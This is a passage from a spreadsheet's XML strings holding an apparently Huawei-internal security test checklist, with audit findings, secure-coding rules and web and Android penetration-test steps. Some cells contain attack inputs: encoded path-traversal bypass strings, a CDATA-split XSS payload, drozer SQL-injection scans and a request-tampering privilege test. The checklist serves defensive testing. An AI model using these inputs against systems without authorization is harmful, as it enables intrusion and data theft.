问题2（一般）：221.176.0.55  北京 移动 AGPSSettings.java (packages\apps\settings\src\com\android\settings) 反编译Settings.apk确认，存在该IP地址。
问题4（提示）：CRM环境中存在默认配置使用公网IP。
问题5（提示）：设备的默认配置存在大网地址：200.67.4.5,193.110.1.1,193.168.4.1等。
问题6（提示）：DNS服务器的ip硬编码成90.0.0.3，该ip为法国的ip地址。
问题7（提示）：web页面默认配置存在美国IP地址：3.2.2.112
问题8（提示）：管理网口默认IP地址为129.9网段，是属于公网IP地址网段。 
问题9（提示）：S10上预置了大量的固定IP地址， 221.176.0.55（中国移动）、74.125.47.104（美国地址）。反编译海外版本浏览器发现遗留大量国内IP网址，海外版本上预置的大量固定IP及国内网址，易引起质疑。
问题10（提示）：设备进入BIOS的时候，输入p 就可以查看boot params ，里面的内容就含有一个inner ip 168.168.0.17 ，该ip地址为美国的ip。</t>
  </si>
  <si>
    <t>1、禁止将根证书以证书文件的形式随发布包一起发布，这样无法防止攻击者篡改根证书文件
推荐的根证书保护方式如下：
1) 将根证书的Hash值存放在TPM芯片里
2) 将根证书硬编码到代码里
3) 将根证书的Hash值写入OTP芯片
4) 将根证书或其Hash值存放到只读BootROM或BIOS里</t>
  </si>
  <si>
    <t>1、是否使用公开的用于调试目的的私钥对软件进行签名
2.对华为开发的软件进行完整性签名时，是否使用华为颁发的代码签名证书对应的私钥进行签名
3、若使用第三方私钥对软件应用进行签名，是否确认该私钥的来源是可信的</t>
  </si>
  <si>
    <t>1、IV是安全随机数
2、IV不能固定（如：写死在代码里）
3、禁止使用前一次加密的最后一个密文分组数据作为下一次加密的IV（这是针对TLS 1.0的BEAST攻击的根因）
4、IV不能写在配置文件里，且每次加密后都应更新
5、IV不能使用某些固定属性，如：某些ID</t>
  </si>
  <si>
    <t>1、是否使用C标准库函数random()、rand()生成随机数用于安全用途
2、是否使用Java的java.util.Random类生成随机数用于安全用途
3、是否每次调用随机数接口时都设置相同的种子，推荐只在进程初始化的时候设置一次
4、使用java.security.SecureRandom()产生随机数时，是否每次都设置了相同的种子，</t>
  </si>
  <si>
    <t>4、具有SQL注入风险的provider没有保存敏感数据
5、对read和write都有设置了权限，不能被随意读取和写入。</t>
  </si>
  <si>
    <t>问题1（一般）：WLAN基本设置中其安全类型可以设置为开放式、WEP、WPA2-PSK、WPA/WPA2-PSK模式，默认WPA/WPA2-PSK模式，当用户设置其成不安全的wep加密模式，没有提示风险；(当设置成开放式时有风险提示）。
问题2（一般）：WIFI直连建立后，传输文件无任何提示。
问题3（一般）：串口下设置idle-time为0时，用户将串口线拔下，然后再次接入设备，不需要认证就可以直接访问设备，存在安全风险，建议配置时增加风险提示。
问题4（一般）：用户A和B通过wifi直连建立连接后，传输数据的时候，不再需要接收方的确认，数据直接在后台进行传输，没有一个确认过程。这样存在一个潜在的威胁，A给B发送的文件如果存在恶意代码，便会在B不知道的情况下传输到B手机上,而没有任何提示。
问题5（一般）：产品支持配置AP认证模式为no-auth模式，这样AP无需经过认证就可以上线，存在引入非法AP的风险。
问题6（一般）：设置用户服务类型为ftp或者Telnet等不安全服务时，界面上没有风险提示，资料中也没有。建议参考其他产品实现，在资料和配置界面增加如下风险提示。
问题7（一般）：产品默认安装TFTP客户端，支持不安全的协议TFTP，使用时应提示客户风险。
问题8（一般）：SC启动的服务默认关闭了安全的TLS与H235协议。并在资料中没有任何提示用户开启的操作。没有默认安全的协议并且没有告知用户。没有对用户形成正向的引导。
问题9（一般）：1）查看SSL私钥文件为server_key.pem私钥文件可以通过FTP方式导出；2）产品支持证书替换功能，但未在产品资料中提示风险，建议客户替换成自己的证书和公私钥对。
问题10（一般）：SIP over TLS支持的加解密组合如下：其中的3DES是不安全算法，RSA即支持1024位及以下，也支持2048位及以上，RSA 1024位及以下也属于不安全算法；是否使用安全算法取决于客户的选择，但是资料中没有提示安全风险。
问题11（提示）：空配置串口初始登录/锁屏时，会让用户选择是否设置串口密码，如果设置串口密码为admin@huawei.com，建议给出该密码为缺省密码的安全提示。
问题12（提示）：WEB网管操作SNMP组和用户新建/修改页面，安全级别选择“不认证不加密”时，界面没有提示安全风险。
问题13（提示）：给用户赋予非安全服务local-user service-type telnet时应该给出风险提示。
问题14（提示）：强制删除命令操作需提示风险，因为该命令可以删除包括系统大包、配置等文件，这类文件对系统来说非常重要，有可能造成设备无法运行。</t>
  </si>
  <si>
    <t>对于仅支持本地接入的某些输入受限设备（如银行ATM机）不强制要求口令复杂度检查，其他情况必须满足如下要求： 
1、缺省口令必须满足复杂度要求
2、IPSec、SSL、SNMP预共享密钥缺省值必须进行复杂度检查(在使用预共享密钥的场景下，如果预共享密钥由口令导出且需要与第三方对接，则不强制要求口令的复杂度）
3、SNMP v1、v2 读/写团体字必须满足口令复杂度要求
4、新建和修改口令时必须检测口令复杂度
5、口令复杂度必须在服务器端检测
6、用户输入口令必须满足口令复杂度要求
7、须缺省打开口令复杂度检查功能
8、禁止使用C标准库函数random()、rand()生成随机数用于安全用途
9、禁止使用Java的java.util.Random类生成随机数用于安全用途
10、系统自动生成的口令长度至少为6个字节
11、用户自行输入的密码需提示用户密码强度</t>
  </si>
  <si>
    <t>1、删除ssl服务器上的证书文件
2、对具体ssl应用进行操作（比如基于ssl承载的账号登录场景等）同时使用wireshark抓包</t>
  </si>
  <si>
    <t>首先通过任务管理器启动mysql服务，命令行进入mysql安装目录下的bin目录，执行以下命令：
windows：mysql -u用户名 -p密码
linux：./mysql -u用户名 -p密码
1.在mysql命令行下执行“select user from mysql.user where Grant_priv ='Y';”。
2.查询结果应该为管理员用户。</t>
  </si>
  <si>
    <t>1.Windows命令行下使用set MYSQL_PWD命令查看是否设置此环境变量；
2.Linux下使用env | grep MYSQL_PWD命令查看是否设置此环境变量。</t>
  </si>
  <si>
    <t>1.网络正常
2.产品提供组网文档</t>
  </si>
  <si>
    <t>1.已知Web服务器域名或IP地址
2.Web业务运行正常
3.目标系统使用了Web Service服务
4.测试用机上安装了AppScan</t>
  </si>
  <si>
    <t>1.启动SOAPUI工具
2.新建工程,导入WSDL文件
3.左侧将列出接口方法，点击需要测试的接口
4.编辑请求消息，修改原来的XML为不合法的XML，如存在重叠的标签、元素顺序不合法、存在多余的元素、存在未关闭的标签、省略消息头信息等等
5.点击发送请求按钮，查看系统是否异常
例如：
&lt;?xml version="1.0" encoding="ISO-8859-1"?&gt;
&lt;note id="666"&gt;
&lt;to&gt;  OWASP
&lt;from&gt;EOIN&lt;/from&gt;
&lt;heading&gt;I am Malformed  &lt;/to&gt;
&lt;/heading&gt;
&lt;body&gt;Don't forget me this weekend!&lt;/body&gt;
&lt;/note&gt;</t>
  </si>
  <si>
    <t>进入系统中在输入框中输入以下XML元字符：
1.单引号 ： ' —— 当没有过滤该字符时，如果注入值是标记中属性值的一部分，它可能在XML解析时产生一个异常情况。 
2.双引号： “ —— 这个字符与单引号具有相同的意义，如果属性值被双引号封闭就可以使用该字符。
3.尖括号： &gt; 以及 &lt;  —— 通过在下列用户输入中增加一个开启或关闭的尖括号
4.注释标记 ： &lt;!--/--&gt; —— 这个字符序列被解释为注释的开始 / 结束。
5.&amp;符号 ： —— &amp; 符号在XML语法中代表XML实体。如果 '&amp;' 本身没有使用 &amp;amp 编码，它可用于检测 XML 注入。
6.CDATA 开始 / 结束标记 ：  &lt;![CDATA[/]] —— 当使用 CDATA 标记时 ， 在它之间的每个字符没有通过 XML 解析器解析。</t>
  </si>
  <si>
    <t>1.系统运行正常
2.存在普通用户、管理员
3.系统中存在管理员可用而在普通用户页面中为灰色(不可用)的按键/页面元素</t>
  </si>
  <si>
    <t>1.系统使用POST请求提交上传功能 ，使用代理拦截消息，进行目录遍历测试。例如/ opt/XXX/普通/Tomcat/webapps/ROOT的形式
2.如果上传文件目录遍历进行了防范，可以进行编码绕过：
URL编码和双重URL编码
%2e%2e%2f represents ../
%2e%2e/ represents ../
..%2f represents ../
%2e%2e%5c represents ..\
%2e%2e\ represents ..\
..%5c represents ..\
%252e%252e%255c represents ..\
..%255c represents ..\ 等等 .
Unicode/UTF-8 编码 ( 它只适用于能够接受超长 UTF-8 序列的系统 )
..%c0%af represents ../
..%c1%9c represents ..\</t>
  </si>
  <si>
    <t>1.系统正常运行
2.已知系统用户名与密码</t>
  </si>
  <si>
    <t>1.登录系统；
2.使用Web代理工具或浏览器插件捕获响应消息，查看Set-Cookie响应头的Expires属性：如果Cookie设置为"; expires=Fri, 13-Jun-2010 13:45:29 GMT"（2010 年6月13日），而当前时间是2008年6月10日，则需要检测该Cookie。
如果Cookie是存储在用户硬盘中的会话令牌，那么有权限读取这个Cookie的攻击者或本地用户（如管理员）就能在过期时间前通过重复提交这个令牌进入应用程序。</t>
  </si>
  <si>
    <t>1.登录系统；
2.将浏览器窗口闲置到Cookie超时；
3.使用浏览器的Cookie管理器插件(如firefox的Cookies manager插件)，将对应的Cookie过期时间延长；
4.点击任意菜单（注销和帮助菜单除外），如果不需要重新登录，说明存在问题。</t>
  </si>
  <si>
    <t>1、在对用户进行权限变更时，会被提示是否可以终止其会话。
2、系统中存在在线用户会话管理功能，且可强制用户下线。</t>
  </si>
  <si>
    <t>不存在“自动登录/记住我”及类似功能
备注：面向终端用户的不适用于该用例。</t>
  </si>
  <si>
    <t>1.检查登入网页的 HTML 代码，看看是否浏览器缓存密码功能已被禁用。
2.在代码中查找禁用密码缓存功能，&lt;INPUT TYPE="password" AUTOCOMPLETE="off"&gt;</t>
  </si>
  <si>
    <t>目标系统提示“帐号已锁定”或者“IP已锁定”或者类似“锁定”等之类的信息。
注：如果已经通过验证码防止帐号口令的暴力破解，那么，不强制遵循本条要求。</t>
  </si>
  <si>
    <t>1.打开被测系统的登录页面；
2.在登录界面中输入正确的帐号、口令信息，提交登录
3.使用WEB代理工具，拦截登录信息
4.检查拦截信息是否使用HTTPS协议，且使用POST方法。
注意：不能使用GET方法传送敏感数据，这是因为当使用 GET 方法，它请求的 URL 很容易在服务器日志中看到，从而导致敏感数据泄漏。</t>
  </si>
  <si>
    <t>1.Web业务运行正常
2.已知Web系统使用的Web容器、框架版本号</t>
  </si>
  <si>
    <t>1.系统中没有未使用的服务和软件
注：系统安装了调试工具，开发库，编译器等，是明显不符合要求的</t>
  </si>
  <si>
    <t>业界标准 （DT）Req 3.21-15 系统帐户的用户的标识（root、oracle、wlsadmin，...）必须明确，必须具有单独的、强大的身份验证方案。共享密码不得用于远程登录。
The identification of users of system accounts (root, oracle, wlsadmin, ...) must be unambiguous and must be carried out by an individual, strong authentication scheme. Shared passwords shall not used for remote login.</t>
  </si>
  <si>
    <t>1.输入口令时口令不能明文
2.UseSystemPasswordChar属性值为true</t>
  </si>
  <si>
    <t>1.目标系统运行正常
2.产品提供的资料和工具完整</t>
  </si>
  <si>
    <t>1、minSdkVersion不低于9，因为Contentprovider无法在android2.2（API-8）申明为私有
2、不向外部app提供的数据的私有content provider设置exported=“false”避免组件暴露(编译api小于17时更应注意此点)
3、内部app通过content provid交换数据设置protectionLevel=“signature”验证签名
4、公开的content provider确保不存储敏感数据
5、使用参数化查询避免注入
6、Uri.decode() before use ContentProvider.openFile()</t>
  </si>
  <si>
    <t>1、私有广播接收器设置exported=’false’，并且不配置intent-filter。(私有广播接收器依然能接收到同UID的广播)
2、sticky broadcast粘性广播中不应包含敏感信息
3、Ordered Broadcast建议设置接收权限receiverPermission，避免恶意应用设置高优先级抢先此广播后并执行abortBroadcast()方法</t>
  </si>
  <si>
    <t>1、通过反编译查看配置文件Androidmanifest.xml确定service方法查看service类，重点关注onCreate/onStarCommand/onHandleIntent方法
2、检索所有类中startService/bindService方法及其传递的数据</t>
  </si>
  <si>
    <t>1、提取出应用申请的权限(提取权限方法：使用drozer工具的指令run app.package.info -a package（包名）
2、对应用进行遍历操作评估权限合理性</t>
  </si>
  <si>
    <t>该行为对应权限android.permission.CAMERA
如果有明显调用摄像头标识的按钮或文字说明（比如二维码扫描的图标）则不算后台行为</t>
  </si>
  <si>
    <t>1、包月业务发送的传输方式要提醒用户（如果走得流量方式则点击订购后有二次确认就不是问题）
2、有二次确认</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</si>
  <si>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4、放置15分钟，在其间进行灭屏亮屏、休眠唤醒、网络断开再连接等操作，观察LBE是否可以检测出后台拨打电话行为</t>
  </si>
  <si>
    <t>1、检查LBE是否提示应用后台读取短信/彩信。如无提示，则测试通过。如有提示，需检查在LBE提示前，应用本身是否事前提示用户后台读取短信/彩信（可以通过弹框的方式或者在用户协议中声明）。如无提示则测试fail
3、如果应用真正退出，则测试通过
4、LBE不会弹出后台读取短信/彩信提示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</si>
  <si>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4、放置15分钟，在其间进行灭屏亮屏、休眠唤醒、网络断开再连接等操作，观察LBE是否可以检测出后台删除联系人行为</t>
  </si>
  <si>
    <t>该行为对应权限
android.permission.CHANGE_WIFI_MULTICAST_STATE
android.permission.CHANGE_WIFI_STATE
android.permission.CHANGE_WIMAX_STATE
android.permission.INTERNET
android.permission.CHANGE_NETWORK_STATE
android.permission.ACCESS_COARSE_LOCATION
android.permission.ACCESS_FINE_LOCATION
android.permission.ACCESS_LOCATION_EXTRA_COMMANDS
android.permission.ACCESS_MOCK_LOCATION</t>
  </si>
  <si>
    <t>2、用户协议里描述的权限需要跟实际使用权限一致。1）不能出现声明了权限但是实际未使用的情况 2）不能出现未申明的后台敏感操作
3、用户协议中描述的权限使用的位置与应用实际使用的位置一致。比如用户协议中说明“在登录后会读取联系人”，那么在登录成功之前或者其他的场景，不可读取联系人</t>
  </si>
  <si>
    <t>1、首次进入应用，在用户协议界面，观察用户协议描述是否清晰无异议
2、检查用户协议描述行为是否与实际一致</t>
  </si>
  <si>
    <t>1、以某帐号连续使用错误的口令登录，直到系统提示帐号或IP已被锁定
2、锁定时长过后再以正确的帐号和口令登录。</t>
  </si>
  <si>
    <t>人工测试：
1、进入修改密码的页面，检查是否只能修改自己的密码
2、配置好代理并设计拦截
3、向服务端发起修改密码请求
4、在代理拦截到的消息中，修改账号为其他用户的账号，然后点发送到服务器</t>
  </si>
  <si>
    <t>1.获取到源代码。
2.使用DSA算法进行签名。</t>
  </si>
  <si>
    <t>子检查项（本检查项为规范建议，产品可根据实际业务场景或客户需求分析是否符合要求）：
1、应用系统使用的密码算法是否可配置，是否记录在配置文件里
2、应用系统使用的密码算法不能写死在代码里
  1）、加密算法参数如“aes-256-cbc”不能写死，应从配置文件中读取。
  2）、密码算法不能硬编码在代码中（如：使用工厂模式设计加密类供产品灵活选择加密算法）。
 3）、（可选）是否对配置文件设置访问控制或使用HMAC进行完整行校验，防止密码算法被恶意修改为不安全算法。
 4）、(可选)应用系统的代码不能只支持一种密码算法(如：AES-128-CBC)，应同时支持更安全的密码算法（如：AES-256-CBC）
常见问题：
1.密码运算使用的参数（如：算法标识、密钥长度、运算模式、填充方式）直接写死在代码里，不可配置。</t>
  </si>
  <si>
    <t>1、软件代码中，不存在任何硬编码的口令
2、所有的登录操作需要将密码发送到服务端进行验证
3、不存在用户无法修改的口令（含程序中的硬编码口令），产品资料中提供修改说明。</t>
  </si>
  <si>
    <t>1、若无录音权限，则忽略步骤2；
2、不允许存在有后台录音且未明示用户的情况。若无录音，则忽略3
3、不存在通话录音相关的代码，比如：BaseVoiceRecorder.java，RecordingCall.java等等</t>
  </si>
  <si>
    <t>1、拥有运行Web服务器的操作系统帐号和口令
2、Web业务运行正常</t>
  </si>
  <si>
    <t>不存在跨站脚本漏洞。
备注：需要对页面上所有可以提交参数的地方进行测试。</t>
  </si>
  <si>
    <t>1、敏感数据（如：口令）在非信任网络之间传输时须支持默认使用sftp/https等安全传输协议，且支持关闭ftp/http/telnet等不安全的传输协议
2、在非信任网络之间禁止以明文形式传输敏感数据，必须使用安全加密机制对数据进行加密
3、非信任网络中传输的对称密钥、共享秘密（如：预置共享密钥、PBKDF中的口令等）须进行加密（如：使用对称和非对称加密算法）;
5、非信任网络中传输的对称密钥、共享秘密（如：预置共享密钥、PBKDF中的口令等）须进行完整性保护（如：使用MAC或签名算法）</t>
  </si>
  <si>
    <t>问题1（致命）：产品软件包（含补丁包）没有提供完整性校验机制（至少 采用Hash + 盐值的方式，推荐使用数字签名），升级过程中没有对软件包进行完整性验证。（B2000使用到的linux没有定制,可以执行二进制文件）.
问题2（致命）;升级软件包可以通过FTP方式上传软件包进行上传，只上传CC文件，不上传证书和数字签名文件，然后重启加载。安全威胁：直接加载一个不正确的版本或者别的产品的版本，或者感染病毒的版本。
问题3（致命）：使用USB方式进行升级，使用的工具是Firmware_Update_V100R001C00B130.exe，直接运行工具加载软件包MPWUDPUPDATE_V100R001C00B130.BIN，升级过程没有对软件包进行完整性校验。
问题4（严重）：产品安装时先解压，再执行安装脚本，在执行安装脚本的过程中校验的软件完整性，该脚本本身就是在该软件包里面的，如果软件包被截获，可以替换软件包后的内容，并删除执行脚本中校验的部分，则完整性校验完全被跳过。
问题5（一般）：Web在线大包升级功能、版本升级没有做完整性校验，软件包/补丁包升级时完整性校验机制存在缺陷。
问题6（一般）;InfoCollector工具未对Tables.inf文件未校验，导致可以被修改下载包含敏感内容的表。建议：增加对配置文件Tables.inf的校验（校验方式和exe/dll一样）。
问题7（一般）：由于InfoCollector工具需要将程序上传至服务器上，并在服务器上执行exe程序，该工具仅仅对ServerCollector.exe  StopServ.exe bcp.exe scptxfr.exe做了校验，未对其他的exe文件做校验，导致简单的替换其他exe程序即可执行后门程序目前对部分重要的EXE文件做校验，可以补充所有EXE和DLL文件的校验。
问题8（一般）：在ftp server端预先将文件secex.dat修改为名字为NodeBCfg.xml的文件，执行MML命令DLD CFGFILE，上传secex.dat文件成功。 威胁：执行该命令时，任何以NodeBCfg.xml为名的文件都可以上传到基站，包含超大文件、病毒等文件，可造成基站宕机等。
问题9（一般）：选择一个压缩包，添加文件名后缀为.bar，伪装为bar包安装部署伪造的bar包，点击next上传该bar包点击next后，可以显示该压缩包中的解压后的文件列表，包含sh脚本、jar包等选择部署后，部署成功。查看operation日志记录，提示上传和deploy包成功根据日志中的上传路径提示，在后台服务器如下目录下发现上传的伪造bar包；该压缩包中的文件也已经被解压后分别上传到SOAIF服务器后台的目录。</t>
  </si>
  <si>
    <t>1、IV是否是安全随机数
2、IV是否固定（如：写死在代码里）
3、是否使用前一次加密的最后一个密文分组数据作为下一次加密的IV
4、IV是否写在配置文件里
5、IV是否使用某些固定属性，如：某些ID</t>
  </si>
  <si>
    <t>问题1（致命）：USB升级模块使用MD5不安全的加密算法校验升级包。输入用MD5是不适合的，黑客可以对软件包进行篡改，但对应的MD5值还是同一个。
问题2（致命）：对IMSI/IMEI加密使用了DES不安全加密算法加密。
问题3（严重）：WEB本地证书签名过程中使用了sha1不安全算法。
HCSEC-1039-1008 The length of the auto-generated RSA public/private key pair used by the SSH server is 512 bits, which is insufficient to provide adequate protection against modern key breaking algorithms. The minimum/default should be 2048 bits</t>
  </si>
  <si>
    <t>1.新建的帐号禁止默认分配所有服务类型（如http、telnet、ssh、ftp等）
2.新建的帐号如果没有配置权限等级，默认权限最小化
3.如果radius服务器没有返回用户的权限信息，禁止系统默认用户为管理员级别以上的权限。</t>
  </si>
  <si>
    <t>1、产品应提供使客户可以替换预置在设备或应用系统中的数字证书的功能
2、产品应在产品资料里建议客户替换华为预置的数字证书，并说明建议客户替换华为预置证书的原因，说明不替换预置证书的风险（华为产品预置的用于软件完整性验证的数字证书可确保软件升级时安装的软件包来自华为，并未被篡改，此证书不能被替换）</t>
  </si>
  <si>
    <t>1、在cmd窗口中输入adb  forward  tcp:31415  tcp:31415
2、输入安装drozer的绝对路径c:\drozer\drozer.bat  console  connect
3、查找存在注入风险的provider组件保存到D盘下的injection.txt文档中：run scanner.provider.injection &gt; D:\injection.txt
4、查看具有SQL注入风险的URI是否有保存敏感数据
5、如果此URI（数据库表）中有敏感信息，检查是否对read和write都有设置了权限，不能被随意读取和写入（app.provider.query，app.provider.update命令，使用备注的帮助文档）。</t>
  </si>
  <si>
    <t>对于仅支持本地接入的某些输入受限设备（如银行ATM机）不强制要求口令复杂度检查，其他情况必须满足如下要求： 
1、缺省口令必是否满足复杂度要求
2、IPSec、SSL、SNMP预共享密钥缺省值是否进行复杂度检查
3、SNMP v1、v2 读/写团体字是否满足口令复杂度要求
4、新建和修改口令时是否检测口令复杂度
5、口令复杂度是否在服务器端检测
6、用户输入口令是否满足口令复杂度要求
7、是否缺省打开口令复杂度检查功能
8、是否使用C标准库函数random()、rand()生成随机数用于安全用途
9、是否使用Java的java.util.Random类生成随机数用于安全用途
10、系统自动生成的口令长度是否至少为6个字节</t>
  </si>
  <si>
    <t>1、开启工具；
2、使用ssl/TLS通道与设备通信；
3、修改client_hello消息中的算法列表，使其与server端支持的算法不重叠；
5、检查是否会收到告警类型为 handshake_failure的告警消息；
ContentType为0x15 Alert</t>
  </si>
  <si>
    <t>w3获取：
1.通过不断建立SSL的链接，让服务端完成资源预留。让单用户消耗网络资料（DOS），对TLS、SSL server疲于预留资源消耗资源，造成服务器重启CPU上升的事故。对SVN等SSL和TLSserver比较有效。——替换脚本 已知漏洞</t>
  </si>
  <si>
    <t>1.设置网络 单击菜单‘Configuration &gt; Settings ’，单击“LAN Settins”设置代理。
2.确定扫描目标  单击菜单‘File &gt; New &gt; New Website Scan’启动扫描向导。选择“Scans single website”选项，在“Website URL”中输入需要 扫描的网站。例http://192.168.0.1
3.确定目标扫描选项 Acunetix WVS自动识别目标网站的操作系统、Web服务器、根路径等基本信 息。选择“Opttimize for following technologies”选项将进一步优化扫描速度。
4.确定爬行选项（选择默认）。
5.确定扫描策略和模式 选择“Sql_Injection”扫描策略，扫描模式选择“Extensive”。 扫描模式： Quick – 在这个模式下，只测试参数选项的第一个参数。 Heuristic – 测试所有的参数。 Extensive – 测试所有的参数和参数组合。
6.确定密码保护区域和HTML forms的输入和登录细节 （选择默认选项）
7.单击‘Finish’按钮开始扫描，分析扫描结果。</t>
  </si>
  <si>
    <t>1.Web Service运行正常
2.已知某接口WSDL地址http://PortalIP:Port/Path/Interface?wsdl
3.已知每个接口方法返回结果的含义</t>
  </si>
  <si>
    <t>1.Web Service运行正常
2.已知WSDL文件
3.已获取SOAPUI工具</t>
  </si>
  <si>
    <t>1.构造锁定情况；
2.启动Wireshark进行嗅探；
3.进行解除锁定操作，提交用户密码/口令；
4.查看Wireshark的嗅探记录，选择目的IP为服务器IP）的记录，右键并点击“Follow TCP Stream”，检查是否能够看到明文的口令/密码。
注：只提供本地接入、登录，做设备管理使用的场景可以不测，windows嗅探工具使用Wireshark，Suse使用tcpdump， solaris使用snoop。</t>
  </si>
  <si>
    <t>测试思路：当XML文件被解析后将去除CDATA的值。因此如果标记内容显示在HTML页面中，就可能增加脚本。
1.进入系统，在输入框中输入如以下值：
&lt;![CDATA[&lt;]]&gt;script&lt;![CDATA[&gt;]]&gt;alert('xss')&lt;![CDATA[&lt;]]&gt;/script&lt;![CDATA[&gt;]]&gt;
2.系统将获得以下节点：
&lt;html&gt;
&lt;![CDATA[&lt;]]&gt;script&lt;![CDATA[&gt;]]&gt;alert('xss')&lt;![CDATA[&lt;]]&gt;/script&lt;![CDATA[&gt;]]&gt;
&lt;/html&gt;
3.在分析阶段将去除 CDATA 标记，并将在HTML中插入下列值：&lt;script&gt;alert('XSS')&lt;/script&gt;在这种情况中，应用将被暴露在XSS弱点中。</t>
  </si>
  <si>
    <t>1.系统正常运行
2.系统使用XML技术实现应用</t>
  </si>
  <si>
    <t>1.目标应用运行正常
2.有正常的用户
3.每种浏览器的处理方式可能不同。（主要为构造URL进行跨站）</t>
  </si>
  <si>
    <t>1.登录系统，请求系统进行业务处理，并记录请求的URL信息
2.注销退出系统
3.使用记录的URL信息发送请求消息到应用系统</t>
  </si>
  <si>
    <t>1.系统正常运行，且获取到用户名密码。
2.系统存在文件上传功能</t>
  </si>
  <si>
    <t>1.登录系统后，访问带有敏感信息的Web页面。
2.使用Web代理工具拦截响应消息，检查消息是否包含：no-cache
HTTP/1.1:
Cache-Control: no-cache
HTTP/1.0:
Pragma: no-cache
Expires: &lt;past date or illegal value (e.g.: 0)&gt;
或者，可直接在 HTML 层 中在包含敏感数据的页面加入如下代码：
HTTP/1.1:
&lt;META HTTP-EQUIV="Cache-Control" CONTENT="no-cache"&gt;
HTTP/1.0:
&lt;META HTTP-EQUIV="Pragma" CONTENT="no-cache"&gt;
&lt;META HTTP-EQUIV="Expires" CONTENT="Sat, 01-Jan-2000 00:00:00 GMT" &gt;
如JSP页面的最前面包括如下代码：
&lt;% 
response.setHeader("Cache-Control","no-cache"); 
response.setHeader("Pragma","no-cache"); 
response.setDateHeader("Expires",0); 
%&gt;</t>
  </si>
  <si>
    <t>1.使用系统管理员登录系统，对已经登录系统的账户进行权限变更，确认权限变更的及时性。
2.检查被变更权限帐号客户端是否强制登出
3.系统管理员是否有强制用户下线操作</t>
  </si>
  <si>
    <t>1.获取到系统代码
2.获取搜索工具</t>
  </si>
  <si>
    <t>1.进入系统的所有管理PORTAL登录界面。
2.检查登录界面是否存在“自动登录/记住我”的功能。</t>
  </si>
  <si>
    <t>系统提示该帐号已被锁定。
注：如果已经通过验证码防止帐号口令的暴力破解，那么，不强制遵循本条要求。</t>
  </si>
  <si>
    <t>1.打开登陆页面
2.在登录界面输入正确的用户名、错误的口令；正确的验证码；并提交登录；
3.根据连续登录失败锁定设置次数N，重复N次登录系统；
4.第N+1次登录系统时检查测试结果</t>
  </si>
  <si>
    <t>1.验证码字符串是随机生成
2.验证码组合不是有限制范围内循环使用，导致验证码可猜测。</t>
  </si>
  <si>
    <t>1.登录系统，系统会跳转到HTTPS页面；
2.访问一个业务页面；
3.使用WEB代理工具，拦截登录信息，将此业务页面的URL改为HTTP访问方法观察是否能够访问。</t>
  </si>
  <si>
    <t>1.Web服务器运行正常
2.Web系统采用了Apache容器
3.拥有Web服务器操作系统的帐号和口令
4.已知Web容器的部署，配置目录</t>
  </si>
  <si>
    <t>1.双击运行DirBuster.jar
2.在host栏中填入目标IP地址或域名，在Port栏中输入服务器对应的端口；如果服务器只接受HTTPS请求，则需要选择Protocol为HTTPS
3.在file with list of dirs/files 栏后点击browse，选择破解的字典库为directory-list-2.3-small.txt：
4.去除Burte Force Files选项
5.其他选项不变，点击右下角的start，启动目录查找 
6.依次右击Response值为200的行，在出现的菜单中点击Open In Browser 
7.分析结果</t>
  </si>
  <si>
    <t>红线 红线条款：
9.1.4 产品发布前提供安全配置/加固指南。
描述如下内容：
  -安全加固及检查，主要包括操作系统、数据库或WEB服务器等加固内容，需要包含具体的加固内容和操作步骤（必选）
  -应用的安全配置，针对产品业务安全应用，需要启用哪些安全选项，配置哪些内容。（对于需要通过对产品开局时进行安全策略配置才能生效的安全功能，需要提供此部分内容）。如果没有应用的安全配置，命名为安全加固指南。安全加固指南是必须的。</t>
  </si>
  <si>
    <t>1、检查结果为：pass
2、执行结果为：auth required pam_wheel.so use_uid</t>
  </si>
  <si>
    <t>1、产品或服务提供隐私声明
2、向运营商或企业客户提供的隐私声明内容完整
3、以华为名义直接向数据主体提供的产品或服务时，提供的隐私声明经过法务部批准，在web产品页面或是界面上提供隐私声明或隐私声明的链接</t>
  </si>
  <si>
    <t>1、反编译查看AndroidManifest.xml（drozer扫描）文件定位content provider是否导出，是否配置权限，确定authority
2、反编译查找path，关键字addURI、hook api 动态监测</t>
  </si>
  <si>
    <t>1、查找动态广播接收器：反编译后检索registerReceiver()
2、查找静态广播接收器：反编译后查看配置文件查找广播接收器组件，注意exported属性
3、查找发送广播内的信息检索sendBroadcast与sendOrderedBroadcast，注意setPackage方法与receiverPermission变量</t>
  </si>
  <si>
    <t>1、导出文件：/data/system/packages.xml
2、在里面搜索所测试应用的包名</t>
  </si>
  <si>
    <t>1、检查LBE是否提示应用后台调用摄像头。如无提示，则测试通过。如有提示，需检查在LBE提示前，应用本身是否事前提示用户后台调用摄像头（可以通过弹框的方式或者在用户协议中声明）。如无提示则测试fail
3、如果应用真正退出，则测试通过
4、LBE不会弹出后台调用摄像头提示</t>
  </si>
  <si>
    <t>1、触发包月业务发送（如通过短信发送或者通过流量发送，可以采用后台偷发短信，偷打电话的方式确认或者断开数据流量看能否发送成功，能发送则肯定走的短信通道）
2、选择订购后观察是否有二次确认</t>
  </si>
  <si>
    <t>1、检查手机管家是否提示应用后台修改短信/彩信记录。如无提示，则测试通过。如有提示，需检查在手机管家提示前，应用本身是否事前提示用户后台修改短信/彩信记录（可以通过弹框的方式或者在用户协议中声明）。如无提示则测试fail
3、如果应用真正退出，则测试通过
4、LBE不会弹出后台修改短信/彩信记录提示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</si>
  <si>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4、放置15分钟，在其间进行灭屏亮屏、休眠唤醒、网络断开再连接等操作，观察LBE是否可以检测出后台读取短信/彩信行为</t>
  </si>
  <si>
    <t>1、LBE检测不到联网行为
2、LBE检测不到联网行为
3、LBE检测不到定位行为</t>
  </si>
  <si>
    <t>1、首次进入应用，在用户协议界面，观察用户协议描述的权限声明
2、对应用进行核心和基本功能遍历，检查用户协议上声明的权限，是否应用中都会使用到
3、对应用进行核心和基本功能遍历，检查用户协议描述中使用敏感权限的位置是否与实际使用的位置一致</t>
  </si>
  <si>
    <t>1、缺省口令符合复杂度要求。
2、产品资料明确提示用户修改默认口令。</t>
  </si>
  <si>
    <t>1、检查口令等认证凭证在传输过程中是否加密
涉及场景：
（1）注册、登陆、修改密码
（2）绑定第三方SNS、IM帐号</t>
  </si>
  <si>
    <t>口令复杂度要求如下：
1、口令长度至少6个字符，并可设置口令最大长度的限制；
2、口令必须包含如下至少两种字符的组合:
      －小写字母；
      －大写字母；
      －数字；
      －特殊字符：`~!@#$%^&amp;*()-_=+\|[{}];:'",&lt;.&gt;/? 
3、口令不能和帐号或者帐号的倒写一样；
4、密码复杂度不符合上述要求应提示用户密码强度</t>
  </si>
  <si>
